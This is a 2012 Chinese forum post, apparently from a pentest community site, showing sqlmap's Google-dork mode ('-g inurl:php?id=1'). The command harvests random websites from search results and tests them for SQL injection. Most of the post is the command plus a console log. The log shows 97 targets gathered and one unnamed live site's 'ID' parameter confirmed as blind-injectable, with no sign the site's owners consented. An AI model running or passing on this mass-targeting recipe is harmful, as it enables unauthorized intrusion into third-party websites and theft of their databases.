切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
SQLMAP GOOGLE机器人[复制链接]
发表于 2012-10-8 22:48:33 | 显示全部楼层 |!read_mode!
RE
./sqlmap.py  -g GOOGLE HACK 关键字


  1. root@Dis9Team:/pen/sql/sqlmap# ./sqlmap.py  -g inurl:php?id=1

  2.     sqlmap/1.0-dev-dbce417 - automatic SQL injection and database takeover tool

  3. http://sqlmap.org

  4. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

  5. [*] starting at 22:40:47

  6. [22:40:47] [INFO] first request to Google to get the session cookie
  7. [22:40:48] [INFO] using Google result page #1
  8. [22:40:54] [INFO] heuristics detected web page charset 'ISO-8859-2'
  9. [22:40:54] [INFO] sqlmap got 100 results for your Google dork expression, 97 of them are testable targets
  10. [22:40:54] [INFO] sqlmap got a total of 97 targets
  11. url 1:
  12. GET http://www.和谐.com/index.php?ID=1
  13. do you want to test this url? [Y/n/q]
  14. > Y
  15. [22:40:58] [INFO] testing url http://www.和谐.com/index.php?ID=1
  16. [22:40:58] [INFO] using '/pen/sql/sqlmap/output/results-09162012_1040pm.csv' as results file
  17. [22:40:59] [INFO] testing connection to the target url
  18. [22:41:01] [INFO] heuristics detected web page charset 'ISO-8859-2'
  19. [22:41:01] [INFO] testing if the url is stable, wait a few seconds
  20. [22:41:03] [INFO] url is stable
  21. [22:41:03] [INFO] testing if GET parameter 'ID' is dynamic
  22. sqlmap got a 302 redirect to 'http://www.和谐.com:80/404.php'. Do you want to follow? [Y/n] n
  23. [22:41:11] [INFO] confirming that GET parameter 'ID' is dynamic
  24. [22:41:12] [INFO] GET parameter 'ID' is dynamic
  25. [22:41:13] [WARNING] reflective value(s) found and filtering out
  26. [22:41:13] [INFO] heuristic test shows that GET parameter 'ID' might be injectable (possible DBMS: MySQL)
  27. [22:41:13] [INFO] testing for SQL injection on GET parameter 'ID'
  28. [22:41:13] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  29. [22:41:18] [INFO] GET parameter 'ID' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
  30. [22:41:18] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
  31. [22:41:19] [INFO] testing 'MySQL > 5.0.11 stacked queries'
  32. [22:41:20] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
  33. parsed error message(s) showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n]
复制代码




附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-23 11:13

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部